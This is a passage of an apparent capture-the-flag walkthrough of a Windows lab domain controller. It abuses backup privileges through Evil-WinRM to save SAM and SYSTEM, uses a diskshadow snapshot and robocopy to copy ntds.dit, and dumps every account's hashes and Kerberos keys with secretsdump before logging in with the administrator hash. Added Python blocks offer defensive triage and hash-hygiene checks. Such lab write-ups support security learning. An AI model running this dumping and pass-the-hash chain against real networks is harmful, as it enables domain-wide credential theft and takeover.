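SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeDebugPrivilege              Debug programs                 Disabled
"""

if __name__ == "__main__":
    for label, text in (("caroline", CAROLINE_PRIVS), ("plain user", PLAIN_USER_PRIVS)):
        print(label)
        for name, state, note in triage(parse_privs(text)):
            print(f"  [!] {name} ({state}): {note}")
```

On the defensive side the same function run over a fleet's service accounts answers "who holds backup-operator-class rights that they do not need", which is the root cause of this whole privilege-escalation chain.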
We couldn't get SECURITY, but we got SAM and SYSTEM, and they are more than enough to get the stored creds:
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> reg save HKLM\SAM sam.save
The operation completed successfully.
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> reg save HKLM\SECURITY SECURITY.save
reg.exe : ERROR: Access is denied.
+ CategoryInfo : NotSpecified: (ERROR: Access is denied.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> reg save HKLM\SYSTEM SYSTEM.save
The operation completed successfully.
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> download SECURITY.save
Info: Downloading C:\Users\Caroline.Robinson\Documents\SECURITY.save to SECURITY.save
Error: Download failed. Check filenames or paths
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> download SYSTEM.save
Info: Downloading C:\Users\Caroline.Robinson\Documents\SYSTEM.save to SYSTEM.save
Info: Download successful!
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> download sam.save
Info: Downloading C:\Users\Caroline.Robinson\Documents\sam.save to sam.save
Info: Download successful!
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents>
And we got the hash for Administrator, so let's log in with WinRM:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby]
└──╼ [★]$ secretsdump.py -sam sam.save -system SYSTEM.save local
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
But trying to log in didn't work out:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby]
└──╼ [★]$ evil-winrm -i 10.129.234.71 -u Administrator -H 8d992faed38128ae85e95fa35868bb43
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
We aren't done with dumping yet; there are several ways to dump domain credentials, for example diskshadow with a VSS snapshot.
The VSS approach always uses the same script, which is this:
set verbose on
set metadata C:\Windows\Temp\test.cab
set context persistent
add volume C: alias mydrive
create
expose %mydrive% E:
Put it in a file and upload it so we can use it with diskshadow, because we don't have an interactive shell.
When I run it I get this:
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> diskshadow /s ./script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: BABYDC, 6/4/2026 11:52:23 AM
-> set verbose O
SET VERBOSE { ON | OFF }
ON Turn on verbose mode. This provides information about writer inclusion/exclusion.
OFF Turn off verbose mode.
Example: SET VERBOSE ON
So my script is fine, but it doesn't read the N after the O in the word ON.
This is an issue with diskshadow and Windows when your script is written on Linux and then moved to Windows, so what is going on?
I think (just a wild guess) that because it runs on Windows it expects the newline to be CRLF (\r\n), but our payload was written on Linux, so it only uses LF (\n), and when it doesn't see a \r at the end of the file the N gets eaten somehow, maybe because it thinks the entire line is malformed.
I have no idea how this happens internally, but I know how to fix it, so let's fix the payload.
We'll just substitute a \r at the end of every line:
sed -i 's/$/\r/' script.txt
Or we can do it more easily with:
└──╼ [★]$ unix2dos script.txt
unix2dos: converting file script.txt to DOS format...
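One caveat with the sed one-liner: it appends a CR whether or not the line already ends with one, so running it on a file that is already CRLF (or running it twice) leaves CR CR LF on every line, and diskshadow then sees a bare CR as a line break. Below is an added example, my own code and not from the post, that classifies a script's line endings and converts to CRLF idempotently, with a function mirroring the sed behaviour for comparison; the diskshadow script embedded as input is the one from the page, and the function names are my own.

```python
import sys


def line_ending_style(data: bytes) -> str:
    """Classify line endings: 'double-cr' (CR CR LF, the sed-twice mistake), 'crlf',
    'lf', 'mixed', or 'none' when the data has no newline at all."""
    if b"\r\r\n" in data:
        return "double-cr"
    crlf = data.count(b"\r\n")
    bare_lf = data.count(b"\n") - crlf
    if crlf and bare_lf:
        return "mixed"
    if crlf:
        return "crlf"
    if bare_lf:
        return "lf"
    return "none"


def to_crlf(data: bytes) -> bytes:
    """Rewrite every line ending as CRLF.

    bytes.splitlines() recognises LF, CRLF and bare CR, so the result is the same whether
    the input was LF, CRLF or mixed, and running it a second time changes nothing.
    A trailing newline is preserved if the input had one."""
    out = b"\r\n".join(data.splitlines())
    if data.endswith((b"\n", b"\r")):
        out += b"\r\n"
    return out


def naive_append_cr(data: bytes) -> bytes:
    """What sed 's/$/\\r/' does: put a CR before every LF, whatever is already there.
    On a file that is already CRLF this yields CR CR LF on every line."""
    return data.replace(b"\n", b"\r\n")


def convert_file(path: str) -> str:
    """Rewrite a script file in place as CRLF; returns the style it had before."""
    with open(path, "rb") as fh:
        data = fh.read()
    before = line_ending_style(data)
    with open(path, "wb") as fh:
        fh.write(to_crlf(data))
    return before


# The diskshadow script from the walkthrough, as written on Linux (LF only).
SCRIPT_LF = (
    b"set verbose on\n"
    b"set metadata C:\\Windows\\Temp\\test.cab\n"
    b"set context persistent\n"
    b"add volume C: alias mydrive\n"
    b"create\n"
    b"expose %mydrive% E:\n"
)

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(f"{sys.argv[1]}: was {convert_file(sys.argv[1])}, now crlf")
    else:
        fixed = to_crlf(SCRIPT_LF)
        print("before:", line_ending_style(SCRIPT_LF), "after:", line_ending_style(fixed))
        print("after a naive second pass:", line_ending_style(naive_append_cr(fixed)))
```

Checking the style before uploading (python3 convert.py script.txt, or just line_ending_style on the bytes) is cheaper than reading diskshadow's usage text to work out which character it ate.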
Now let's run the command again over WinRM:
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> diskshadow /s ./script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: BABYDC, 6/4/2026 11:59:18 AM
-> set verbose ON
-> set metadata C:\Windows\Temp\test.cab
-> set context persistent
-> add volume C: alias mydrive
-> create
Excluding writer "Shadow Copy Optimization Writer" , because all of its components have been excluded.
Excluding writer "BITS Writer" , because all of its components have been excluded.
* Including writer "Task Scheduler Writer":
+ Adding component: \TasksStore
* Including writer "VSS Metadata Store Writer":
+ Adding component: \WriterMetadataStore
* Including writer "Performance Counters Writer":
+ Adding component: \PerformanceCounters
* Including writer "System Writer":
+ Adding component: \System Files
+ Adding component: \Win32 Services Files
* Including writer "ASR Writer":
+ Adding component: \ASR\ASR
+ Adding component: \Volumes\Volume{711fc68a-0000-0000-0000-100000000000}
+ Adding component: \Disks\harddisk0
+ Adding component: \BCD\BCD
* Including writer "WMI Writer":
+ Adding component: \WMI
* Including writer "DFS Replication service writer":
+ Adding component: \SYSVOL\8D6E7361-AC28-4EC5-9914-ACB6AE407BCB-2EB58465-8BD4-4748-9135-FE1B23D5A20B
* Including writer "Registry Writer":
+ Adding component: \Registry
* Including writer "COM+ REGDB Writer":
+ Adding component: \COM+ REGDB
* Including writer "NTDS":
+ Adding component: \C:_Windows_NTDS\ntds
Alias mydrive for shadow ID {2b911045-4358-4439-aca7-8e4576fdf6bf} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {6fd37dcc-bad7-4ed0-bc9c-ba92f45d56aa} set as environment variable.
Inserted file Manifest.xml into .cab file test.cab
Inserted file BCDocument.xml into .cab file test.cab
Inserted file WM0.xml into .cab file test.cab
Inserted file WM1.xml into .cab file test.cab
Inserted file WM2.xml into .cab file test.cab
Inserted file WM3.xml into .cab file test.cab
Inserted file WM4.xml into .cab file test.cab
Inserted file WM5.xml into .cab file test.cab
Inserted file WM6.xml into .cab file test.cab
Inserted file WM7.xml into .cab file test.cab
Inserted file WM8.xml into .cab file test.cab
Inserted file WM9.xml into .cab file test.cab
Inserted file WM10.xml into .cab file test.cab
Inserted file WM11.xml into .cab file test.cab
Inserted file Dis8DA5.tmp into .cab file test.cab
Querying all shadow copies with the shadow copy set ID {6fd37dcc-bad7-4ed0-bc9c-ba92f45d56aa} * Shadow copy ID = {2b911045-4358-4439-aca7-8e4576fdf6bf} %mydrive%
- Shadow copy set: {6fd37dcc-bad7-4ed0-bc9c-ba92f45d56aa} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{711fc68a-0000-0000-0000-100000000000}\ [C:\]
- Creation time: 6/4/2026 11:59:37 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: BabyDC.baby.vl
- Service machine: BabyDC.baby.vl
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent Differential
Number of shadow copies listed: 1
-> expose %mydrive% E:
-> %mydrive% = {2b911045-4358-4439-aca7-8e4576fdf6bf}
The shadow copy was successfully exposed as E:\.
->
Now the snapshot is made and exposed at E:\, so let's access it and grab the ntds.dit file.
We can't just download it directly; we have to use robocopy in backup mode (/b), which uses SeBackupPrivilege to bypass the system lock on NTDS:
*Evil-WinRM* PS C:\Windows\Temp> robocopy /b E:\Windows\ntds . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Thursday, June 4, 2026 12:16:46 PM
Source : E:\Windows\ntds\
Dest : C:\Windows\Temp\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 E:\Windows\ntds\
New File 16.0 m ntds.dit
< SNIP>
100%
100%
------------------------------------------------------------------------------
Total Copied Skipped Mismatch FAILED Extras
Dirs : 1 0 1 0 0 0
Files : 1 1 0 0 0 0
Bytes : 16.00 m 16.00 m 0 0 0 0
Times : 0:00:00 0:00:00 0:00:00 0:00:00
Speed : 118,987,347 Bytes/sec.
Speed : 6,808.511 MegaBytes/min.
Ended : Thursday, June 4, 2026 12:16:46 PM
And dump it with secretsdump as well:
[★]$ secretsdump.py -ntds ntds.dit -system SYSTEM.save LOCAL
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 41d56bf9b458d01951f592ee4ba00ea6
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BABYDC$:1000:aad3b435b51404eeaad3b435b51404ee:3d538eabff6633b62dbaa5fb5ade3b4d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6da4842e8c24b99ad21a92d620893884:::
baby.vl\Jacqueline.Barnett:1104:aad3b435b51404eeaad3b435b51404ee:20b8853f7aa61297bfbc5ed2ab34aed8:::
baby.vl\Ashley.Webb:1105:aad3b435b51404eeaad3b435b51404ee:02e8841e1a2c6c0fa1f0becac4161f89:::
baby.vl\Hugh.George:1106:aad3b435b51404eeaad3b435b51404ee:f0082574cc663783afdbc8f35b6da3a1:::
baby.vl\Leonard.Dyer:1107:aad3b435b51404eeaad3b435b51404ee:b3b2f9c6640566d13bf25ac448f560d2:::
baby.vl\Ian.Walker:1108:aad3b435b51404eeaad3b435b51404ee:0e440fd30bebc2c524eaaed6b17bcd5c:::
baby.vl\Connor.Wilkinson:1110:aad3b435b51404eeaad3b435b51404ee:e125345993f6258861fb184f1a8522c9:::
baby.vl\Joseph.Hughes:1112:aad3b435b51404eeaad3b435b51404ee:31f12d52063773769e2ea5723e78f17f:::
baby.vl\Kerry.Wilson:1113:aad3b435b51404eeaad3b435b51404ee:181154d0dbea8cc061731803e601d1e4:::
baby.vl\Teresa.Bell:1114:aad3b435b51404eeaad3b435b51404ee:7735283d187b758f45c0565e22dc20d8:::
baby.vl\Caroline.Robinson:1115:aad3b435b51404eeaad3b435b51404ee:9c76997b6cea7695224013678d9f5bcc:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:ad08cbabedff5acb70049bef721524a23375708cadefcb788704ba00926944f4
Administrator:aes128-cts-hmac-sha1-96:ac7aa518b36d5ea26de83c8d6aa6714d
Administrator:des-cbc-md5:d38cb994ae806b97
BABYDC$:aes256-cts-hmac-sha1-96:1a7d22edfaf3a8083f96a0270da971b4a42822181db117cf98c68c8f76bcf192
BABYDC$:aes128-cts-hmac-sha1-96:406b057cd3a92a9cc719f23b0821a45b
BABYDC$:des-cbc-md5:8fef68979223d645
krbtgt:aes256-cts-hmac-sha1-96:9c578fe1635da9e96eb60ad29e4e4ad90fdd471ea4dff40c0c4fce290a313d97
krbtgt:aes128-cts-hmac-sha1-96:1541c9f79887b4305064ddae9ba09e14
krbtgt:des-cbc-md5:d57383f1b3130de5
baby.vl\Jacqueline.Barnett:aes256-cts-hmac-sha1-96:851185add791f50bcdc027e0a0385eadaa68ac1ca127180a7183432f8260e084
baby.vl\Jacqueline.Barnett:aes128-cts-hmac-sha1-96:3abb8a49cf283f5b443acb239fd6f032
baby.vl\Jacqueline.Barnett:des-cbc-md5:01df1349548a206b
baby.vl\Ashley.Webb:aes256-cts-hmac-sha1-96:fc119502b9384a8aa6aff3ad659aa63bab9ebb37b87564303035357d10fa1039
baby.vl\Ashley.Webb:aes128-cts-hmac-sha1-96:81f5f99fd72fadd005a218b96bf17528
baby.vl\Ashley.Webb:des-cbc-md5:9267976186c1320e
baby.vl\Hugh.George:aes256-cts-hmac-sha1-96:0ea359386edf3512d71d3a3a2797a75db3168d8002a6929fd242eb7503f54258
baby.vl\Hugh.George:aes128-cts-hmac-sha1-96:50b966bdf7c919bfe8e85324424833dc
baby.vl\Hugh.George:des-cbc-md5:296bec86fd323b3e
baby.vl\Leonard.Dyer:aes256-cts-hmac-sha1-96:6d8fd945f9514fe7a8bbb11da8129a6e031fb504aa82ba1e053b6f51b70fdddd
baby.vl\Leonard.Dyer:aes128-cts-hmac-sha1-96:35fd9954c003efb73ded2fde9fc00d5a
baby.vl\Leonard.Dyer:des-cbc-md5:022313dce9a252c7
baby.vl\Ian.Walker:aes256-cts-hmac-sha1-96:54affe14ed4e79d9c2ba61713ef437c458f1f517794663543097ff1c2ae8a784
baby.vl\Ian.Walker:aes128-cts-hmac-sha1-96:78dbf35d77f29de5b7505ee88aef23df
baby.vl\Ian.Walker:des-cbc-md5:bcb094c2012f914c
baby.vl\Connor.Wilkinson:aes256-cts-hmac-sha1-96:55b0af76098dfe3731550e04baf1f7cb5b6da00de24c3f0908f4b2a2ea44475e
baby.vl\Connor.Wilkinson:aes128-cts-hmac-sha1-96:9d4af8203b2f9e3ecf64c1cbbcf8616b
baby.vl\Connor.Wilkinson:des-cbc-md5:fda762e362ab7ad3
baby.vl\Joseph.Hughes:aes256-cts-hmac-sha1-96:2e5f25b14f3439bfc901d37f6c9e4dba4b5aca8b7d944957651655477d440d41
baby.vl\Joseph.Hughes:aes128-cts-hmac-sha1-96:39fa92e8012f1b3f7be63c7ca9fd6723
baby.vl\Joseph.Hughes:des-cbc-md5:02f1cd9e52e0f245
baby.vl\Kerry.Wilson:aes256-cts-hmac-sha1-96:db5f7da80e369ee269cd5b0dbaea74bf7f7c4dfb3673039e9e119bd5518ea0fb
baby.vl\Kerry.Wilson:aes128-cts-hmac-sha1-96:aebbe6f21c76460feeebea188affbe01
baby.vl\Kerry.Wilson:des-cbc-md5:1f191c8c49ce07fe
baby.vl\Teresa.Bell:aes256-cts-hmac-sha1-96:8bb9cf1637d547b31993d9b0391aa9f771633c8f2ed8dd7a71f2ee5b5c58fc84
baby.vl\Teresa.Bell:aes128-cts-hmac-sha1-96:99bf021e937e1291cc0b6e4d01d96c66
baby.vl\Teresa.Bell:des-cbc-md5:4cbcdc3de6b50ee9
baby.vl\Caroline.Robinson:aes256-cts-hmac-sha1-96:44daf1b1becfe1cc191e96620f645100e0f96b26057be5f6b0d6d6118f298372
baby.vl\Caroline.Robinson:aes128-cts-hmac-sha1-96:23a7b7cace0781126134ecc2ab8ad89d
baby.vl\Caroline.Robinson:des-cbc-md5:ef2c62d98323379e
[*] Cleaning up...
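Once a dump like this exists, the useful defender output is not the hashes themselves but what they say about password hygiene. The added example below (my own code, not part of the writeup) parses secretsdump's user:rid:lmhash:nthash::: lines and reports accounts with an empty NT hash, accounts that still store an LM hash, and distinct accounts sharing one NT hash, i.e. the same password. The sample dump is constructed with made-up hashes; only the two empty-password constants are real values.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# secretsdump hash line: [domain\]user:rid:lmhash:nthash:::
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+)"
    r":(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)


def parse_dump(text):
    """Hash rows from secretsdump output; status and Kerberos-key lines are ignored."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            row = m.groupdict()
            row["rid"] = int(row["rid"])
            rows.append(row)
    return rows


def analyse(rows):
    """Password-hygiene findings from the parsed rows.

    empty_password : accounts whose NT hash is the empty-password hash
    lm_stored      : accounts still storing an LM hash (weak, easily cracked format)
    shared_nt      : {nt_hash: [users]} where distinct accounts share one password"""
    findings = {"empty_password": [], "lm_stored": [], "shared_nt": {}}
    by_nt = defaultdict(list)
    for r in rows:
        if r["nt"] == EMPTY_NT:
            findings["empty_password"].append(r["user"])
        if r["lm"] != EMPTY_LM:
            findings["lm_stored"].append(r["user"])
        by_nt[r["nt"]].append(r["user"])
    findings["shared_nt"] = {h: u for h, u in by_nt.items() if len(u) > 1 and h != EMPTY_NT}
    return findings


# Constructed dump in secretsdump's format: hashes are made up except the empty-password constants.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
EXDC$:1000:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
example.test\\svc.backup:1104:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
example.test\\old.legacy:1105:0a1b2c3d4e5f60718293a4b5c6d7e8f9:abcdefabcdefabcdefabcdefabcdefab:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:0000000000000000000000000000000000000000000000000000000000000000
[*] Cleaning up...
"""

if __name__ == "__main__":
    for key, value in analyse(parse_dump(SAMPLE_DUMP)).items():
        print(f"{key}: {value}")
```

A shared NT hash between a privileged and an unprivileged account is exactly the kind of reuse that turns one sprayed password into domain admin, and the report is produced without ever cracking anything.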
So let's try that hash with WinRM:
[★]$ nxc winrm baby.vl -u administrator -H ee4457ae59f1e3fbd764e33d9cef123d
WINRM 10.129.234.71 5985 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
WINRM 10.129.234.71 5985 BABYDC [+] baby.vl\administrator:ee4457ae59f1e3fbd764e33d9cef123d (Pwn3d!)
So let's grab the flag:
[★]$ nxc winrm baby.vl -u administrator -H ee4457ae59f1e3fbd764e33d9cef123d -X 'type C:\Users\Administrator\Desktop\root.txt'
WINRM 10.129.234.71 5985 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
WINRM 10.129.234.71 5985 BABYDC [+] baby.vl\administrator:ee4457ae59f1e3fbd764e33d9cef123d (Pwn3d!)
WINRM 10.129.234.71 5985 BABYDC [+] Executed command (shell type: powershell)
WINRM 10.129.234.71 5985 BABYDC 06fb0c1b0a81a72975ba8012f89e2e20
